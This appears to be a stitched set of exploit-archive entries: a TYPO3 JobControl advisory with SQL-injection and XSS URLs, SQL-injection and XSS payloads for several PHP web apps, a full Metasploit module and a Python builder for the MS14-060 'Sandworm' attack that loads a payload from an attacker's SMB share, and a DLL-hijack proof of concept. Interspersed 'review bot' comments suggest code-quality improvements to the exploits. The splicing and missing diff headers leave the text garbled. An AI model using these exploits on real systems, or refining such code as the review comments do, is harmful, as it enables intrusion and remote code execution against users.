your joblist.
It works with html templates so it's easy to configure how the extension
will look for your site. The list can be shown as a "paginated list",
including a page-browser. The extension itself is multi-lingual, at this
moment English, Danish, Polish, German, Russian and Dutch are included.
The best feature however is that multi-lingual jobs are fully supported
too, so you can provide a translation for a job if you have a multi-lingual
site.
JobControl uses MM-relation tables for regions, branches, sectors etc.
This means that for every new site, you can make a new list of branches to
use. They are not hardcoded and don't require any TypoScript to set up.
JobControl is very easy to set up, with good default templates that can
be styled to your needs using css stylesheets. It's very powerful and
flexible too with lots of configuration options for advanced users.
Business recommendation:
----------------------------------------------------------------------
According to the Typo3 Security Team the extension maintainer does not
maintain the extension any longer and thus, is not providing an update.
Exploitation can be prevented with the workaround below. However, the
extension should be replaced with a maintained alternative.
Vulnerability description:
----------------------------------------------------------------------
1) Unauthenticated Blind SQL Injection
dmmjobcontrol provides a search function for the job database. Several
input fields (for example education, region, sector) are used without
proper sanitization to create the SELECT statement of the search query.
2) Reflected Cross Site Scripting (XSS)
The value of the "keyword" parameter is used without any sanitization
to create the html response of the search request. This can be abused
to inject malicious HTML/JavaScript code into the HTML response.
Proof of concept:
----------------------------------------------------------------------
1) Unauthenticated Blind SQL Injection
The following PoC shows blind based SQL injection on the sector parameter, other
parameters are also vulnerable
http://xxxx/jobs/?tx_dmmjobcontrol_pi1%5Bsearch_submit%5D=Search&tx_dmmjobcontrol_pi1%5Bsearch%5D%5Bsector%5D%5B%5D=3%29and%20benchmark%2820000000%2csha1%281%29%29--%20
2) Reflected Cross Site Scripting (XSS)
http://172.16.37.232/typo3/jobs/?tx_dmmjobcontrol_pi1%5Bsearch_submit%5D=Search&tx_dmmjobcontrol_pi1%5Bsearch%5D%5Bkeyword%5D=">
Vulnerable / tested versions:
----------------------------------------------------------------------
dmmjobcontrol 2.14.0
Disclosure timeline:
----------------------------------------------------------------------
05/09/2014: Reporting to the Typo3 Security team
05/09/2014: Response from Typo3 Security team that they received the mail
24/09/2014: Mail to Typo3 Security team, asking for the current status
25/09/2014: Response from Typo3 Security Team that they released an advisory[1]
25/09/2014: Release of public advisory
Workaround (use on your own responsiblity):
----------------------------------------------------------------------
In the file:
typo3conf/ext/dmmjobcontrol/pi1/class.tx_dmmjobcontrol_pi1.php
To fix the Cross Site Scripting (XSS) vulnerability, replace line 112 with the
following PHP code:
$markerArray['###KEYWORD_VALUE###'] =
htmlspecialchars($session['search']['keyword'], ENT_QUOTES);
To fix the SQL Injection vulnerability, replace line 257 with the following
PHP code:
$whereAdd[] = $table.'.uid_local=tx_dmmjobcontrol_job.uid AND
('.$table.'.uid_foreign='.implode(' OR '.$table.'.uid_foreign=',
intval($value)).')';
References:
----------------------------------------------------------------------
[1] TYPO3-EXT-SA-2014-012: Several vulnerabilities in extension JobControl
(dmmjobcontrol)
http://typo3.org/teams/security/security-bulletins/typo3-extensions/typo3-ext-sa-2014-012
--
*Best regards*
*Attacker: Adler - Team: FreiheitFacebook:
https://www.facebook.com/adler.freiheit
<https://www.facebook.com/adler.freiheit>*
*We are a white hat hacker.We are looking for security vulnerabilities. And
let you know.But we do not damage your system.*
*follow me! if you are interested in us!*
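Review bot: The SQL-injection workaround, `$whereAdd[] = ... implode(' OR '.$table.'.uid_foreign=', intval($value)).')';`, hands an integer to `implode()`, whose second argument must be an array; the PoC URL for this very issue sends `search[sector][]=`, i.e. `$value` is an array, so `intval($value)` collapses it to `1` or `0` and `implode()` then fails (warning and `NULL` on PHP 5, `TypeError` on PHP 8), leaving an empty `uid_foreign=` comparison. The search feature is broken rather than sanitised. The intended fix casts each element instead: `implode(' OR '.$table.'.uid_foreign=', array_map('intval', (array) $value))`. The original line 257 is not shown here, so whether `$value` can also arrive as a scalar is inferred from the PoC; the `(array)` cast covers both cases.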

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45003/info
AuraCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AuraCMS 1.62 is vulnerable; other versions may also be affected.
http://www.example.com/pdf.php?id=140+AND+1=2+UNION+SELECT+ind0nesianc0der,1,2,3,4,5,6,7

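--- a/platforms/php/webapps/35016.txt
+++ b/platforms/php/webapps/35016.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/45066/info
+Easy Banner Free is prone to multiple SQL-injection and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+An attacker may leverage the HTML-injection issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is viewed, and launch other attacks.
+The attacker may exploit the SQL-injection issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+Easy Banner Free 2009.05.18 is vulnerable; other versions may also be affected.
+username: &#039; or 1#
+password: &#039; or &#039;a&#039;=&#039;a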
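Review bot: 35016.txt and 35017.txt carry the same BID 45066 description word for word, yet each holds a different proof-of-concept (the login-form values here, the `siteurl`/`urlbanner` values in 35017), so neither file states which of the listed issues its payload belongs to; a one-line label such as `# SQL injection (login form)` above `username:` in this file and `# HTML injection (banner settings)` above `&#039;siteurl&#039;` in 35017 would make the split clear. The `&#039;` sequences in the last two lines appear to be HTML entities carried over from the SecurityFocus page rather than the literal characters the advisory meant, and the same applies to the two payload lines of 35017.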

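--- a/platforms/php/webapps/35017.txt
+++ b/platforms/php/webapps/35017.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/45066/info
+Easy Banner Free is prone to multiple SQL-injection and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+An attacker may leverage the HTML-injection issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is viewed, and launch other attacks.
+The attacker may exploit the SQL-injection issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+Easy Banner Free 2009.05.18 is vulnerable; other versions may also be affected.
+&#039;siteurl&#039; : http://"><script>alert(XSS)</script><aa aa="
+&#039;urlbanner&#039; : "><script>alert(XSS)</script><aa aa=".gif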


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/45079/info
4homepages 4images is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/4images/categories.php?cat_id=1&page=-2999+%27%29+union/

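--- a/platforms/win32/local/35020.rb
+++ b/platforms/win32/local/35020.rb
@@ -0,0 +1,238 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'msf/core'
+class Metasploit3 < Msf::Exploit::Remote
+Rank = ExcellentRanking
+include Msf::Exploit::FILEFORMAT
+include Msf::Exploit::EXE
+def initialize(info={})
+super(update_info(info,
+'Name' => "MS14-060 Microsoft Windows OLE Package Manager Code Execution",
+'Description' => %q{
+This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)
+allowing arbitrary code execution, publicly known as "Sandworm". Platforms such as Windows
+Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be
+vulnerable. However, based on our testing, the most reliable setup is on Windows platforms
+running Office 2013 and Office 2010 SP2. And please keep in mind that some other setups such
+as using Office 2010 SP1 might be less stable, and sometimes may end up with a crash due to
+a failure in the CPackage::CreateTempFileName function.
+This module will generate three files: an INF, a GIF, and a PPSX file. You are required to
+set up a SMB or Samba 3 server and host the INF and GIF there. Systems such as Ubuntu or an
+older version of Winodws (such as XP) work best for this because they require little
+configuration to get going. The PPSX file is what you should send to your target.
+In detail, the vulnerability has to do with how the Object Packager 2 component
+(packager.dll) handles an INF file that contains malicious registry changes, which may be
+leveraged for code execution. First of all, Packager does not load the INF file directly.
+But as an attacker, you can trick it to load your INF anyway by embedding the file path as
+a remote share in an OLE object. The packager will then treat it as a type of media file,
+and load it with the packager!CPackage::OLE2MPlayerReadFromStream function, which will
+download it with a CopyFileW call, save it in a temp folder, and pass that information for
+later. The exploit will do this loading process twice: first for a fake gif file that's
+actually the payload, and the second for the INF file.
+The packager will also look at each OLE object's XML Presentation Command, specifically the
+type and cmd property. In the exploit, "verb" media command type is used, and this triggers
+the packager!CPackage::DoVerb function. Also, "-3" is used as the fake gif file's cmd
+property, and "3" is used for the INF. When the cmd is "-3", DoVerb will bail. But when "3"
+is used (again, for the INF file), it will cause the packager to try to find appropriate
+handler for it, which will end up with C:\Windows\System32\infDefaultInstall.exe, and that
+will install/run the malicious INF file, and finally give us arbitrary code execution.
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'Unknown', # Vulnerability discovery
+'sinn3r', # Metasploit module
+'juan vazquez' # Metasploit module
+],
+'References' =>
+[
+['CVE', '2014-4114'],
+['OSVDB', '113140'],
+['MSB', 'MS14-060'],
+['BID', '70419'],
+['URL' , 'http://www.isightpartners.com/2014/10/cve-2014-4114/'],
+['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm/'],
+['URL', 'http://blog.vulnhunt.com/index.php/2014/10/14/cve-2014-4114_sandworm-apt-windows-ole-package-inf-arbitrary-code-execution/']
+],
+'Payload' =>
+{
+'Space' => 2048,
+'DisableNops' => true
+},
+'Platform' => 'win',
+'Arch' => ARCH_X86,
+'Targets' =>
+[
+['Windows 7 SP1 / Office 2010 SP2 / Office 2013', {}],
+],
+'Privileged' => false,
+'DisclosureDate' => "Oct 14 2014",
+'DefaultTarget' => 0))
+register_options(
+[
+OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx']),
+OptString.new('UNCPATH', [ true, 'The UNC folder to use (Ex: \\\\192.168.1.1\\share)' ])
+], self.class)
+end
+def exploit
+@unc = validate_unc_path
+if @unc.nil?
+fail_with(Failure::BadConfig, "UNCPATH must be a remote shared folder")
+end
+print_status("Creating the EXE payload...")
+payload_name = "#{rand_text_alpha(4)}.gif"
+p = generate_payload_exe
+print_status("Creating the INF file...")
+inf_name = "#{rand_text_alpha(4)}.inf"
+inf = inf_file(payload_name)
+print_status("Creating '#{datastore['FILENAME']}' file ...")
+exe_stream = ole_exe(payload_name)
+inf_stream = ole_inf(inf_name)
+zip = zip_ppsx(exe_stream, inf_stream)
+file_create(zip)
+payload_path = my_file_create(p, payload_name)
+print_good("#{payload_name} stored at #{payload_path}, copy it to the remote share: #{@unc}")
+inf_path = my_file_create(inf, inf_name)
+print_good("#{inf_name} stored at #{inf_path}, copy it to the remote share: #{@unc}")
+end
+def validate_unc_path
+if datastore['UNCPATH'] =~ /^\\{2}[[:print:]]+\\[[:print:]]+\\*$/
+unc = datastore['UNCPATH']
+else
+unc = nil
+end
+unc
+end
+def my_file_create(data, name)
+ltype = "exploit.fileformat.#{self.shortname}"
+path = store_local(ltype, nil, data, name)
+path
+end
+def zip_ppsx(ole_exe, ole_inf)
+zip_data = {}
+data_dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4114', 'template')
+Dir["#{data_dir}/**/**"].each do |file|
+unless File.directory?(file)
+zip_data[file.sub(data_dir,'')] = File.read(file)
+end
+end
+# add the otherwise skipped "hidden" file
+file = "#{data_dir}/_rels/.rels"
+zip_data[file.sub(data_dir,'')] = File.read(file)
+# put our own OLE streams
+zip_data['/ppt/embeddings/oleObject1.bin'] = ole_exe
+zip_data['/ppt/embeddings/oleObject2.bin'] = ole_inf
+# create the ppsx
+ppsx = Rex::Zip::Archive.new
+zip_data.each_pair do |k,v|
+ppsx.add_file(k,v)
+end
+ppsx.pack
+end
+def ole_inf(file_name)
+content = "EmbeddedStg2.txt\x00"
+content << "#{@unc}\\#{file_name}\x00"
+data = [content.length].pack('V')
+data << content
+ole = create_ole("\x01OLE10Native", data)
+ole
+end
+def ole_exe(file_name)
+content = "EmbeddedStg1.txt\x00"
+content << "#{@unc}\\#{file_name}\x00"
+data = [content.length].pack('V')
+data << content
+ole = create_ole("\x01OLE10Native", data)
+ole
+end
+def create_ole(stream_name, data)
+ole_tmp = Rex::Quickfile.new('ole')
+stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE)
+stm = stg.create_stream(stream_name)
+stm << data
+stm.close
+directory = stg.instance_variable_get(:@directory)
+directory.each_entry do |entry|
+if entry.instance_variable_get(:@_ab) == 'Root Entry'
+# 02260200-0000-0000-c000-000000000046 # Video clip
+clsid = Rex::OLE::CLSID.new("\x02\x26\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46")
+entry.instance_variable_set(:@_clsId, clsid)
+end
+end
+# write to disk
+stg.close
+ole_contents = File.read(ole_tmp.path)
+ole_tmp.close
+ole_tmp.unlink
+ole_contents
+end
+def inf_file(gif_name)
+inf = <<-EOF
+; 61883.INF
+; Copyright (c) Microsoft Corporation. All rights reserved.
+[Version]
+Signature = "$CHICAGO$"
+Class=61883
+ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}
+Provider=%Msft%
+DriverVer=06/21/2006,6.1.7600.16385
+[DestinationDirs]
+DefaultDestDir = 1
+[DefaultInstall]
+RenFiles = RxRename
+AddReg = RxStart
+[RxRename]
+#{gif_name}.exe, #{gif_name}
+[RxStart]#
+HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,%1%\\#{gif_name}.exe
+EOF
+inf
+end
+end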
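Review bot: `create_ole` leaves its Quickfile behind on disk whenever `stg.close` or the `File.read` that follows raises, because `ole_tmp.close` and `ole_tmp.unlink` sit at the end of the method instead of in an `ensure` clause; moving those two calls into `ensure` guarantees the temporary file is removed on every exit path. `ole_inf` and `ole_exe` are identical apart from the `EmbeddedStg2.txt` / `EmbeddedStg1.txt` label, so one private helper taking the label as a parameter would remove the duplication. In `zip_ppsx` the template entries are read with `File.read`; if that template contains any binary members, `File.binread` is the safer choice on hosts that perform text-mode translation. The module description also spells "Winodws" where "Windows" is meant.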


@ -0,0 +1,93 @@
#!/usr/bin/env python
import os
import zipfile
import sys
'''
Full Exploit: http://www.exploit-db.com/sploits/35019.tar.gz
Very quick and ugly [SandWorm CVE-2014-4114] exploit builder
Exploit Title: CVE-2014-4114 SandWorm builder
Built to run on: Linux/MacOSX
Date: 17/10/2014
Exploit Author: Vlad Ovtchinikov (@v1ad_o)
Vendor Homepage: microsoft.com
Tested on: Win7Sp1 64 bit - Microsoft Offcie 2013 Plus
Demo: http://youtu.be/ljjEkhflpvM
CVE : CVE-2014-4114
NOTE:
expl.inf (md5 8313034e9ab391df83f6a4f242ec5f8d) + expl.zip (md5 4a39121a60cc79d211fc7f7cfe00b707)
should be located in the same dir as the builder.
01:39 cve-2014-4114.py
19:35 expl.inf
15:37 expl.zip
e.g. python cve-2014-4114.py 10.0.0.233 rdb xxx.exe
10.0.0.233 - ip
rdb - share
xxx.exe - dropper
'''
host=sys.argv[1]
share=sys.argv[2]
mal_file=sys.argv[3]
print "\nPoC exploit builder v0.1 for logical OLE flaw in packager.dll [CVE-2014-4114] by vlad@sensepost.com @v1ad_o\n"
print "Building ... \n "
# extract the original .ppsx PoC
mal_file= mal_file.replace(' ', '')[:-4].lower()
fh = open('expl.zip', 'rb')
z = zipfile.ZipFile(fh)
for name in z.namelist():
outpath = "./tmp"
z.extract(name, outpath)
fh.close()
os.mkdir('out')
os.chdir('tmp')
# oleObject1.bin mod for GIF
infile = open('ppt/embeddings/oleObject1.bin')
outfile = open('ppt/embeddings/1.bin','w')
replacements = {'10.0.0.34':host,'public':share,'slide1.gif':mal_file+'.gif'}
for line in infile:
for src, target in replacements.iteritems():
line = line.replace(src, target)
outfile.write(line)
infile.close()
outfile.close()
os.remove ('ppt/embeddings/oleObject1.bin')
os.rename ('ppt/embeddings/1.bin','ppt/embeddings/oleObject1.bin')
# oleObject2.bin mod for INF
infile = open('ppt/embeddings/oleObject2.bin')
outfile = open('ppt/embeddings/2.bin','w')
replacements = {'10.0.0.34':host,'public':share,'slide1.inf':mal_file+'.inf'}
for line in infile:
for src, target in replacements.iteritems():
line = line.replace(src, target)
outfile.write(line)
infile.close()
outfile.close()
os.remove ('ppt/embeddings/oleObject2.bin')
os.rename ('ppt/embeddings/2.bin','ppt/embeddings/oleObject2.bin')
os.system("zip -q -9 -r ../out/exploit.ppsx * ")
os.chdir('..')
# oleObject2.bin mod for INF prep
infile = open('expl.inf')
outfile = open('out/'+mal_file+'.inf','w')
replacements = {'slide1':mal_file}
for line in infile:
for src, target in replacements.iteritems():
line = line.replace(src, target)
outfile.write(line)
infile.close()
outfile.close()
os.system("rm -rf tmp")
print 'Copy the .inf .gif (renamed file.exe=>file.gif) to:\n'
print '*\\\\'+host +'\\'+ share +'\\'+ mal_file+'.gif\n'
print '*\\\\'+host +'\\'+ share +'\\'+ mal_file+'.inf\n'
print 'Done - collect your files from the [out] folder.\n'


@ -0,0 +1,74 @@
source: http://www.securityfocus.com/bid/44989/info
Multiple products from Native Instruments are prone to multiple vulnerabilities that let attackers execute arbitrary code.
An attacker can exploit these issues by enticing a legitimate user to use a vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
The issues affect the following:
Guitar Rig 4 Player 4.1.1
KONTAKT 4 PLAYER 4.1.3.4125
Service Center 2.2.5
REAKTOR 5 PLAYER 5.5.1.10584
/*
Native Instruments Guitar Rig 4 Player v4.1.1 Insecure Library Loading Vulnerability
Vendor: Native Instruments GmbH
Product web page: http://www.native-instruments.com
Affected version: 4.1.1.1845 (Standalone)
Summary: GUITAR RIG 4 PLAYER is the free, modular and expandable effects processor
from Native Instruments, combining creative effects routing possibilities with
ease-of-use and pristine sound quality. The included FACTORY SELECTION library
provides one stunning Amp emulation with Matched Cabinet, plus 20 effects and sound
modifiers to shape and enhance any audio signal.
Desc: Guitar Rig 4 Player suffers from a DLL hijacking vulnerability, which could be
exploited by remote attackers to compromise a vulnerable system. This issue is
caused due to the application insecurely loading certain libraries ("libjack.dll")
from the current working directory, which could allow attackers to execute arbitrary
code by tricking a user into opening specific related files (.nkm and .nkp) from a
network share.
Tested on: Microsoft Windows XP Professional SP3 (English)
Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk
Advisory ID: ZSL-2010-4973
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4973.php
06.11.2010
*/
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
dll_mll();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
int dll_mll()
{
MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}